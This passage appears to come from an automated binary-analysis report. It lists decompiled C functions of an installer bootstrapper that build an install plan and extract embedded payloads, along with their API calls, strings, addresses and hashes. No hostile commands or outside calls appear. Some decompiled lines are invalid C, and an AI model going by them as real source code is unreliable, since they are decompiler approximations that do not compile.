							_push(0xf2);
							L26:
							_push("pathutil.cpp");
							E004300D9(_t63);
						}
					}
				}
				if(_v12 != 0) {
					E004380AB(_v12);
				}
				if(_v8 != 0) {
					E004380AB(_v8);
				}
				return _t88;
			}




















                                                                                                                                                                  0x00431926
                                                                                                                                                                  0x0043192a
                                                                                                                                                                  0x0043192c
                                                                                                                                                                  0x00431930
                                                                                                                                                                  0x00431938
                                                                                                                                                                  0x0043193b
                                                                                                                                                                  0x0043193e
                                                                                                                                                                  0x0043193f
                                                                                                                                                                  0x00431a46
                                                                                                                                                                  0x00431a4a
                                                                                                                                                                  0x00431b48
                                                                                                                                                                  0x00431b4c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00431a50
                                                                                                                                                                  0x00431a50
                                                                                                                                                                  0x00431a58
                                                                                                                                                                  0x00431a5d
                                                                                                                                                                  0x00431a65
                                                                                                                                                                  0x00431a6d
                                                                                                                                                                  0x00431a71
                                                                                                                                                                  0x00431a82
                                                                                                                                                                  0x00431a8a
                                                                                                                                                                  0x00431ab4
                                                                                                                                                                  0x00431b2d
                                                                                                                                                                  0x00431b32
                                                                                                                                                                  0x00431b43
                                                                                                                                                                  0x00431b43
                                                                                                                                                                  0x00431b4f
                                                                                                                                                                  0x00431b53
                                                                                                                                                                  0x00431b5f
                                                                                                                                                                  0x00431b34
                                                                                                                                                                  0x00431b3d
                                                                                                                                                                  0x00431b41
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00431b41
                                                                                                                                                                  0x00431ab6
                                                                                                                                                                  0x00431ab6
                                                                                                                                                                  0x00431abe
                                                                                                                                                                  0x00431acb
                                                                                                                                                                  0x00431acf
                                                                                                                                                                  0x00431ae0
                                                                                                                                                                  0x00431ae8
                                                                                                                                                                  0x00431b12
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00431b14
                                                                                                                                                                  0x00431b14
                                                                                                                                                                  0x00431b19
                                                                                                                                                                  0x00431b1a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00431b1a
                                                                                                                                                                  0x00431aea
                                                                                                                                                                  0x00431aea
                                                                                                                                                                  0x00431afb
                                                                                                                                                                  0x00431afe
                                                                                                                                                                  0x00431b05
                                                                                                                                                                  0x00431b08
                                                                                                                                                                  0x00431b09
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00431b09
                                                                                                                                                                  0x00431ae8
                                                                                                                                                                  0x00431acf
                                                                                                                                                                  0x00431a8c
                                                                                                                                                                  0x00431a8c
                                                                                                                                                                  0x00431a9d
                                                                                                                                                                  0x00431aa0
                                                                                                                                                                  0x00431aa7
                                                                                                                                                                  0x00431aaa
                                                                                                                                                                  0x00431aab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00431aab
                                                                                                                                                                  0x00431a8a
                                                                                                                                                                  0x00431a71
                                                                                                                                                                  0x00431945
                                                                                                                                                                  0x0043194a
                                                                                                                                                                  0x00431952
                                                                                                                                                                  0x00431956
                                                                                                                                                                  0x00431963
                                                                                                                                                                  0x0043196b
                                                                                                                                                                  0x00431996
                                                                                                                                                                  0x0043199b
                                                                                                                                                                  0x00431a05
                                                                                                                                                                  0x00431a0a
                                                                                                                                                                  0x00431a43
                                                                                                                                                                  0x00431a43
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00431a0c
                                                                                                                                                                  0x00431a1f
                                                                                                                                                                  0x00431a24
                                                                                                                                                                  0x00431a36
                                                                                                                                                                  0x00431a3a
                                                                                                                                                                  0x00431a40
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00431a40
                                                                                                                                                                  0x00431a3a
                                                                                                                                                                  0x00431a24
                                                                                                                                                                  0x0043199d
                                                                                                                                                                  0x0043199e
                                                                                                                                                                  0x004319aa
                                                                                                                                                                  0x004319ae
                                                                                                                                                                  0x004319bb
                                                                                                                                                                  0x004319c3
                                                                                                                                                                  0x004319ee
                                                                                                                                                                  0x004319f3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004319f5
                                                                                                                                                                  0x004319f5
                                                                                                                                                                  0x004319fa
                                                                                                                                                                  0x004319fb
                                                                                                                                                                  0x00431b1f
                                                                                                                                                                  0x00431b1f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00431b1f
                                                                                                                                                                  0x004319c5
                                                                                                                                                                  0x004319c5
                                                                                                                                                                  0x004319d6
                                                                                                                                                                  0x004319d9
                                                                                                                                                                  0x004319e0
                                                                                                                                                                  0x004319e3
                                                                                                                                                                  0x004319e4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004319e4
                                                                                                                                                                  0x004319c3
                                                                                                                                                                  0x004319ae
                                                                                                                                                                  0x0043196d
                                                                                                                                                                  0x0043196d
                                                                                                                                                                  0x0043197e
                                                                                                                                                                  0x00431981
                                                                                                                                                                  0x00431988
                                                                                                                                                                  0x0043198b
                                                                                                                                                                  0x0043198c
                                                                                                                                                                  0x00431b21
                                                                                                                                                                  0x00431b21
                                                                                                                                                                  0x00431b26
                                                                                                                                                                  0x00431b26
                                                                                                                                                                  0x0043196b
                                                                                                                                                                  0x00431956
                                                                                                                                                                  0x00431b65
                                                                                                                                                                  0x00431b6a
                                                                                                                                                                  0x00431b6a
                                                                                                                                                                  0x00431b73
                                                                                                                                                                  0x00431b78
                                                                                                                                                                  0x00431b78
                                                                                                                                                                  0x00431b83

                                                                                                                                                                  APIs
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,00000040,00000000,00000000), ref: 00431963
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0043196D
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,00000000), ref: 004319BB
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004319C5
                                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000040,004103DF,00000000,004103DF,00000040,00000000,00000000), ref: 00431A82
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00431A8C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$EnvironmentExpandStrings$FullNamePath
                                                                                                                                                                  • String ID: pathutil.cpp
                                                                                                                                                                  • API String ID: 3720696297-741606033
                                                                                                                                                                  • Opcode ID: 8302609f9341bf9baa515b09c419db5eac0591efa8fb8540263865f7f5c746d4
                                                                                                                                                                  • Instruction ID: a1ab15e9507b1f8aeada4e08483d79cae5328f2b4c6e9037c4160056fb2a0d6c
                                                                                                                                                                  • Opcode Fuzzy Hash: 8302609f9341bf9baa515b09c419db5eac0591efa8fb8540263865f7f5c746d4
                                                                                                                                                                  • Instruction Fuzzy Hash: B461C732E00229ABEF219AA58C45BAFB6E9EF48741F115177FD01E7160E738DE00D798
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B90E, Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 203COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E0040B90E(signed int _a4, short** _a8, signed short* _a12) {
				signed int _v8;
				short* _v12;
				short* _v16;
				int* _t92;
				int* _t95;
				intOrPtr* _t98;
				intOrPtr* _t103;
				intOrPtr* _t106;
				signed short _t115;
				intOrPtr _t123;
				signed int _t128;
				signed short _t134;
				short** _t135;
				signed int _t137;
				intOrPtr _t138;
				short* _t140;
				signed short _t144;
				signed int _t145;
				signed short _t148;
				signed int _t149;
				signed int _t150;
				int _t151;
				int _t152;
				short** _t153;
				signed int _t154;
				signed int _t156;
				signed int _t157;

				_t129 = _a8;
				_t128 = _a4;
				_t140 =  *_a8;
				_t144 = 0;
				_v8 = _v8 & 0;
				_t150 = 0;
				_v12 = _t140;
				if( *((intOrPtr*)(_t128 + 0x50)) <= 0) {
					L6:
					_t151 =  *0x456f50; // 0x0
					_t152 = _t151 + 1;
					 *0x456f50 = _t152;
					_t144 = E0040BD21(_t129, _t162, _t128,  &_v8);
					_t163 = _t144;
					if(_t144 < 0) {
						L9:
						_push("Failed to append package start action.");
						L24:
						_push(_t144);
						E00430A57();
						goto L26;
					}
					_t92 = _v8;
					 *_t92 = 1;
					_t92[2] = _t152;
					_t144 = E0040C0DB(_t129, _t163, _t128,  &_v8);
					_t164 = _t144;
					if(_t144 < 0) {
						L14:
						_push("Failed to append rollback cache action.");
						goto L24;
					}
					_t95 = _v8;
					 *_t95 = 1;
					_t95[2] = _t152;
					_t144 = E0040BD21(_t129, _t164, _t128,  &_v8);
					if(_t144 >= 0) {
						_t98 = _v8;
						_t153 = _a8;
						 *_t98 = 3;
						 *(_t98 + 8) = _t153;
						_a4 =  *((intOrPtr*)(_t128 + 0x50)) - 1;
						_t144 = E0040C0DB(_t129, __eflags, _t128,  &_v8);
						__eflags = _t144;
						if(_t144 >= 0) {
							_t103 = _v8;
							_t145 = 0;
							 *_t103 = 5;
							 *(_t103 + 8) = _t153;
							_v12 = 0;
							__eflags = _t153[0x20];
							if(__eflags <= 0) {
								L18:
								_t144 = E0040BD21(_t129, __eflags, _t128,  &_v8);
								__eflags = _t144;
								if(__eflags < 0) {
									L20:
									_push("Failed to append cache action.");
									goto L24;
								}
								_t106 = _v8;
								 *_t106 = 4;
								 *(_t106 + 8) = _t153;
								 *((intOrPtr*)(_a4 * 0x28 +  *((intOrPtr*)(_t128 + 0x4c)) + 0x18)) =  *((intOrPtr*)(_t128 + 0x50)) - 1;
								_t144 = E0040BD21( *((intOrPtr*)(_t128 + 0x50)) - 1, __eflags, _t128,  &_v8);
								__eflags = _t144;
								if(_t144 >= 0) {
									_t154 = _v8;
									 *_t154 = 6;
									_t134 = CreateEventW(0, 1, 0, 0);
									 *(_t154 + 8) = _t134;
									__eflags = _t134;
									if(_t134 != 0) {
										 *_a12 = _t134;
										_t135 = _a8;
										 *((intOrPtr*)(_t128 + 0x34)) =  *((intOrPtr*)(_t128 + 0x34)) + 1;
										__eflags =  *((intOrPtr*)(_t135 + 0x44)) - 2;
										_t86 =  *((intOrPtr*)(_t135 + 0x44)) != 2;
										__eflags = _t86;
										 *(_t135 + 0x54) = 0 | _t86;
										goto L26;
									}
									_t115 = GetLastError();
									__eflags = _t115;
									_t148 =  <=  ? _t115 : _t115 & 0x0000ffff | 0x80070000;
									__eflags = _t148;
									_t144 =  >=  ? 0x80004005 : _t148;
									E004300D9(0x80004005, "plan.cpp", 0x723, _t144);
									_push("Failed to create syncpoint event.");
									goto L24;
								}
								goto L20;
							} else {
								goto L16;
							}
							while(1) {
								L16:
								_v16 = _t153[0x1f];
								_t144 = E0040BD6A(_t128, _t153, _a4,  *((intOrPtr*)(_t153[0x1f] + _t145 * 8)),  *((intOrPtr*)(_t153[0x1f] + 4 + _t145 * 8)), 0);
								__eflags = _t144;
								if(_t144 < 0) {
									break;
								}
								_t156 = _a4 * 0x28;
								 *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x4c)) + _t156 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x4c)) + _t156 + 0xc)) + 1;
								_t149 = _v12;
								_t129 =  *((intOrPtr*)(_v16 + _t149 * 8));
								 *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x4c)) + _t156 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x4c)) + _t156 + 0x10)) +  *((intOrPtr*)( *((intOrPtr*)(_v16 + _t149 * 8)) + 0x10));
								asm("adc [edx+esi+0x14], eax");
								_t153 = _a8;
								_t145 = _t149 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t153[0x20];
								if(__eflags < 0) {
									continue;
								}
								goto L18;
							}
							_push("Failed to append payload cache action.");
							goto L24;
						}
						goto L14;
					}
					goto L9;
				} else {
					_t137 = 0;
					_a4 = 0;
					do {
						_t123 =  *((intOrPtr*)(_t128 + 0x4c));
						if( *((intOrPtr*)(_t123 + _t137)) != 4) {
							goto L5;
						}
						if(CompareStringW(0, 0,  *( *(_t123 + _t137 + 8)), 0xffffffff, _t140, 0xffffffff) == 2) {
							_t23 = _t150 + 1; // 0x1
							__eflags = _t23 -  *((intOrPtr*)(_t128 + 0x50));
							if(_t23 <  *((intOrPtr*)(_t128 + 0x50))) {
								_t138 =  *((intOrPtr*)(_t128 + 0x4c));
								_t157 = _t150 * 0x28;
								__eflags =  *((intOrPtr*)(_t157 + _t138 + 0x28)) - 6;
								if( *((intOrPtr*)(_t157 + _t138 + 0x28)) == 6) {
									 *_a12 =  *(_t157 + _t138 + 0x30);
								}
							}
							L26:
							return _t144;
						}
						_t137 = _a4;
						_t140 = _v12;
						L5:
						_t150 = _t150 + 1;
						_t137 = _t137 + 0x28;
						_a4 = _t137;
						_t162 = _t150 -  *((intOrPtr*)(_t128 + 0x50));
					} while (_t150 <  *((intOrPtr*)(_t128 + 0x50)));
					goto L6;
				}
			}






























                                                                                                                                                                  0x0040b914
                                                                                                                                                                  0x0040b918
                                                                                                                                                                  0x0040b91b
                                                                                                                                                                  0x0040b91f
                                                                                                                                                                  0x0040b921
                                                                                                                                                                  0x0040b924
                                                                                                                                                                  0x0040b926
                                                                                                                                                                  0x0040b92c
                                                                                                                                                                  0x0040b968
                                                                                                                                                                  0x0040b968
                                                                                                                                                                  0x0040b972
                                                                                                                                                                  0x0040b974
                                                                                                                                                                  0x0040b97f
                                                                                                                                                                  0x0040b981
                                                                                                                                                                  0x0040b983
                                                                                                                                                                  0x0040b9bd
                                                                                                                                                                  0x0040b9bd
                                                                                                                                                                  0x0040bb2d
                                                                                                                                                                  0x0040bb2d
                                                                                                                                                                  0x0040bb2e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bb34
                                                                                                                                                                  0x0040b985
                                                                                                                                                                  0x0040b988
                                                                                                                                                                  0x0040b98e
                                                                                                                                                                  0x0040b99b
                                                                                                                                                                  0x0040b99d
                                                                                                                                                                  0x0040b99f
                                                                                                                                                                  0x0040ba18
                                                                                                                                                                  0x0040ba18
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ba18
                                                                                                                                                                  0x0040b9a1
                                                                                                                                                                  0x0040b9a4
                                                                                                                                                                  0x0040b9aa
                                                                                                                                                                  0x0040b9b7
                                                                                                                                                                  0x0040b9bb
                                                                                                                                                                  0x0040b9f2
                                                                                                                                                                  0x0040b9f5
                                                                                                                                                                  0x0040b9f8
                                                                                                                                                                  0x0040b9fe
                                                                                                                                                                  0x0040ba05
                                                                                                                                                                  0x0040ba12
                                                                                                                                                                  0x0040ba14
                                                                                                                                                                  0x0040ba16
                                                                                                                                                                  0x0040ba22
                                                                                                                                                                  0x0040ba25
                                                                                                                                                                  0x0040ba27
                                                                                                                                                                  0x0040ba2d
                                                                                                                                                                  0x0040ba30
                                                                                                                                                                  0x0040ba33
                                                                                                                                                                  0x0040ba39
                                                                                                                                                                  0x0040ba90
                                                                                                                                                                  0x0040ba9a
                                                                                                                                                                  0x0040ba9c
                                                                                                                                                                  0x0040ba9e
                                                                                                                                                                  0x0040bacd
                                                                                                                                                                  0x0040bacd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bacd
                                                                                                                                                                  0x0040baa3
                                                                                                                                                                  0x0040baa9
                                                                                                                                                                  0x0040baaf
                                                                                                                                                                  0x0040bab9
                                                                                                                                                                  0x0040bac7
                                                                                                                                                                  0x0040bac9
                                                                                                                                                                  0x0040bacb
                                                                                                                                                                  0x0040badb
                                                                                                                                                                  0x0040bae5
                                                                                                                                                                  0x0040baf1
                                                                                                                                                                  0x0040baf3
                                                                                                                                                                  0x0040baf6
                                                                                                                                                                  0x0040baf8
                                                                                                                                                                  0x0040bb3a
                                                                                                                                                                  0x0040bb3c
                                                                                                                                                                  0x0040bb3f
                                                                                                                                                                  0x0040bb44
                                                                                                                                                                  0x0040bb48
                                                                                                                                                                  0x0040bb48
                                                                                                                                                                  0x0040bb4b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bb4b
                                                                                                                                                                  0x0040bafa
                                                                                                                                                                  0x0040bb09
                                                                                                                                                                  0x0040bb0b
                                                                                                                                                                  0x0040bb13
                                                                                                                                                                  0x0040bb15
                                                                                                                                                                  0x0040bb23
                                                                                                                                                                  0x0040bb28
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bb28
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ba3b
                                                                                                                                                                  0x0040ba3b
                                                                                                                                                                  0x0040ba44
                                                                                                                                                                  0x0040ba54
                                                                                                                                                                  0x0040ba56
                                                                                                                                                                  0x0040ba58
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ba60
                                                                                                                                                                  0x0040ba63
                                                                                                                                                                  0x0040ba67
                                                                                                                                                                  0x0040ba70
                                                                                                                                                                  0x0040ba76
                                                                                                                                                                  0x0040ba7d
                                                                                                                                                                  0x0040ba81
                                                                                                                                                                  0x0040ba84
                                                                                                                                                                  0x0040ba85
                                                                                                                                                                  0x0040ba88
                                                                                                                                                                  0x0040ba8e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ba8e
                                                                                                                                                                  0x0040bad4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bad4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ba16
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b92e
                                                                                                                                                                  0x0040b92e
                                                                                                                                                                  0x0040b930
                                                                                                                                                                  0x0040b933
                                                                                                                                                                  0x0040b933
                                                                                                                                                                  0x0040b93a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b954
                                                                                                                                                                  0x0040b9c7
                                                                                                                                                                  0x0040b9ca
                                                                                                                                                                  0x0040b9cd
                                                                                                                                                                  0x0040b9d3
                                                                                                                                                                  0x0040b9d6
                                                                                                                                                                  0x0040b9d9
                                                                                                                                                                  0x0040b9de
                                                                                                                                                                  0x0040b9eb
                                                                                                                                                                  0x0040b9eb
                                                                                                                                                                  0x0040b9de
                                                                                                                                                                  0x0040bb4e
                                                                                                                                                                  0x0040bb54
                                                                                                                                                                  0x0040bb54
                                                                                                                                                                  0x0040b956
                                                                                                                                                                  0x0040b959
                                                                                                                                                                  0x0040b95c
                                                                                                                                                                  0x0040b95c
                                                                                                                                                                  0x0040b95d
                                                                                                                                                                  0x0040b960
                                                                                                                                                                  0x0040b963
                                                                                                                                                                  0x0040b963
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b933

                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,?,000000FF,00000001,000000FF,00000000,000003D8,000000F8,0000001C,000003BC,00401414,00000088,000003D8,000002A8,000000B8), ref: 0040B94B
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,000003BC,00401414,000003BC,00401414,000003BC,00401414,000003BC,00401414,000003BC,00401414,000003BC,00401414), ref: 0040BAEB
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401414,00000000,?,?,?,?,00401EA4,?,?), ref: 0040BAFA
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to append package start action., xrefs: 0040B9BD
                                                                                                                                                                  • Failed to append rollback cache action., xrefs: 0040BA18
                                                                                                                                                                  • Failed to append cache action., xrefs: 0040BACD
                                                                                                                                                                  • plan.cpp, xrefs: 0040BB1E
                                                                                                                                                                  • Failed to append payload cache action., xrefs: 0040BAD4
                                                                                                                                                                  • Failed to create syncpoint event., xrefs: 0040BB28
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareCreateErrorEventLastString
                                                                                                                                                                  • String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
                                                                                                                                                                  • API String ID: 801187047-2489563283
                                                                                                                                                                  • Opcode ID: cdedbb8e4400c648185ca9d63d4ff5074e001d855e1025adf4abed2c83878732
                                                                                                                                                                  • Instruction ID: 7f3dadcc25ffc38f38689847690c8a67db67647abe1a96bf27d72611fed998e7
                                                                                                                                                                  • Opcode Fuzzy Hash: cdedbb8e4400c648185ca9d63d4ff5074e001d855e1025adf4abed2c83878732
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D715F75A00205EFDB15DF58C880A6AB7F5FF88310F2180AAED15AB395DB35ED41CB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407D91, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 150COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E00407D91(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				char _v12;
				int _v16;
				int _v20;
				int _v24;
				short* _v28;
				intOrPtr _t50;
				int _t58;
				intOrPtr* _t60;
				intOrPtr* _t62;
				intOrPtr* _t64;
				int _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				int _t70;
				int _t71;
				intOrPtr _t73;

				_t70 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				while(1) {
					_t71 = E00418F25(_a12,  &_v8);
					if(_t71 == 0x80070103) {
						break;
					}
					if(_t71 < 0) {
						_push("Failed to get next stream.");
						goto L28;
					} else {
						_t62 = _a4;
						_t67 = _t70;
						_v28 = _v8;
						_v20 = _t67;
						if( *((intOrPtr*)(_t62 + 4)) <= _t70) {
							L10:
							_t50 = _v16;
							_t71 = 0x80070490;
						} else {
							_t58 = _t70;
							_v24 = _t70;
							do {
								_t73 =  *_t62 + _t58;
								if( *((intOrPtr*)(_t73 + 4)) != 2) {
									goto L9;
								} else {
									_t69 = _a8;
									if(_t69 == 0 ||  *((intOrPtr*)(_t73 + 0x3c)) == _t69) {
										if(CompareStringW(0x7f, _t70,  *(_t73 + 0x38), 0xffffffff, _v28, 0xffffffff) == 2) {
											_t50 = _t73;
											_v16 = _t50;
											_t71 = _t70;
										} else {
											_t58 = _v24;
											_t67 = _v20;
											goto L9;
										}
									} else {
										goto L9;
									}
								}
								goto L11;
								L9:
								_t67 = _t67 + 1;
								_t58 = _t58 + 0x58;
								_v20 = _t67;
								_v24 = _t58;
								_t19 = _t62 + 4; // 0x8b2c74db
							} while (_t67 <  *_t19);
							goto L10;
						}
						L11:
						if(_t71 < 0) {
							_push(_v8);
							_push("Failed to find embedded payload: %ls");
							L34:
							_push(_t71);
							E00430A57();
						} else {
							_t21 = _t50 + 0x50; // 0x4021f7
							_t63 = _t21;
							_t22 = _t50 + 0x18; // 0x4ccfe853
							_t71 = E004314A9(_a16,  *_t22, _t21);
							if(_t71 < 0) {
								_push("Failed to concat file paths.");
								goto L28;
							} else {
								_t71 = E00431C88(_t67,  *_t63,  &_v12);
								if(_t71 < 0) {
									_push("Failed to get directory portion of local file path");
									goto L28;
								} else {
									_t71 = E00437850(_v12, _t70);
									if(_t71 < 0) {
										_push("Failed to ensure directory exists");
										goto L28;
									} else {
										_t71 = E00419196(_a12,  *_t63);
										if(_t71 < 0) {
											_push("Failed to extract file.");
											L28:
											_push(_t71);
											E00430A57();
										} else {
											 *((intOrPtr*)(_v16 + 0x4c)) = 1;
											continue;
										}
									}
								}
							}
						}
					}
					L35:
					if(_v8 != 0) {
						E004380AB(_v8);
					}
					if(_v12 != 0) {
						E004380AB(_v12);
					}
					return _t71;
				}
				_t60 = _a4;
				_t71 = _t70;
				if( *((intOrPtr*)(_t60 + 4)) > _t71) {
					_t64 =  *_t60;
					_t68 = _a8;
					do {
						if(_t68 == 0 ||  *((intOrPtr*)(_t64 + 0x3c)) == _t68) {
							if( *((intOrPtr*)(_t64 + 0x4c)) < 1) {
								_t71 = 0x8007000d;
								E004300D9(_t60, "payload.cpp", 0x119, 0x8007000d);
								_push( *_t64);
								_push("Payload was not found in container: %ls");
								goto L34;
							} else {
								goto L23;
							}
						} else {
							goto L23;
						}
						goto L35;
						L23:
						_t70 = _t70 + 1;
						_t64 = _t64 + 0x58;
						_t36 = _t60 + 4; // 0x8b2c74db
					} while (_t70 <  *_t36);
				}
				goto L35;
			}




















                                                                                                                                                                  0x00407d9a
                                                                                                                                                                  0x00407d9c
                                                                                                                                                                  0x00407d9f
                                                                                                                                                                  0x00407da2
                                                                                                                                                                  0x00407e78
                                                                                                                                                                  0x00407e84
                                                                                                                                                                  0x00407e8c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407dac
                                                                                                                                                                  0x00407ef9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407db2
                                                                                                                                                                  0x00407db2
                                                                                                                                                                  0x00407db8
                                                                                                                                                                  0x00407dba
                                                                                                                                                                  0x00407dbd
                                                                                                                                                                  0x00407dc3
                                                                                                                                                                  0x00407e11
                                                                                                                                                                  0x00407e11
                                                                                                                                                                  0x00407e14
                                                                                                                                                                  0x00407dc5
                                                                                                                                                                  0x00407dc5
                                                                                                                                                                  0x00407dc7
                                                                                                                                                                  0x00407dca
                                                                                                                                                                  0x00407dcc
                                                                                                                                                                  0x00407dd2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407dd4
                                                                                                                                                                  0x00407dd4
                                                                                                                                                                  0x00407dd9
                                                                                                                                                                  0x00407df6
                                                                                                                                                                  0x00407ebf
                                                                                                                                                                  0x00407ec1
                                                                                                                                                                  0x00407ec4
                                                                                                                                                                  0x00407dfc
                                                                                                                                                                  0x00407dfc
                                                                                                                                                                  0x00407dff
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407dff
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407dd9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407e02
                                                                                                                                                                  0x00407e02
                                                                                                                                                                  0x00407e03
                                                                                                                                                                  0x00407e06
                                                                                                                                                                  0x00407e09
                                                                                                                                                                  0x00407e0c
                                                                                                                                                                  0x00407e0c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407dca
                                                                                                                                                                  0x00407e19
                                                                                                                                                                  0x00407e1b
                                                                                                                                                                  0x00407eef
                                                                                                                                                                  0x00407ef2
                                                                                                                                                                  0x00407f1c
                                                                                                                                                                  0x00407f1c
                                                                                                                                                                  0x00407f1d
                                                                                                                                                                  0x00407e21
                                                                                                                                                                  0x00407e21
                                                                                                                                                                  0x00407e21
                                                                                                                                                                  0x00407e25
                                                                                                                                                                  0x00407e30
                                                                                                                                                                  0x00407e34
                                                                                                                                                                  0x00407ee8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407e3a
                                                                                                                                                                  0x00407e45
                                                                                                                                                                  0x00407e49
                                                                                                                                                                  0x00407ee1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407e4f
                                                                                                                                                                  0x00407e58
                                                                                                                                                                  0x00407e5c
                                                                                                                                                                  0x00407ed2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407e5e
                                                                                                                                                                  0x00407e68
                                                                                                                                                                  0x00407e6c
                                                                                                                                                                  0x00407ecb
                                                                                                                                                                  0x00407ed7
                                                                                                                                                                  0x00407ed7
                                                                                                                                                                  0x00407ed8
                                                                                                                                                                  0x00407e6e
                                                                                                                                                                  0x00407e71
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407e71
                                                                                                                                                                  0x00407e6c
                                                                                                                                                                  0x00407e5c
                                                                                                                                                                  0x00407e49
                                                                                                                                                                  0x00407e34
                                                                                                                                                                  0x00407e1b
                                                                                                                                                                  0x00407f25
                                                                                                                                                                  0x00407f29
                                                                                                                                                                  0x00407f2e
                                                                                                                                                                  0x00407f2e
                                                                                                                                                                  0x00407f37
                                                                                                                                                                  0x00407f3c
                                                                                                                                                                  0x00407f3c
                                                                                                                                                                  0x00407f47
                                                                                                                                                                  0x00407f47
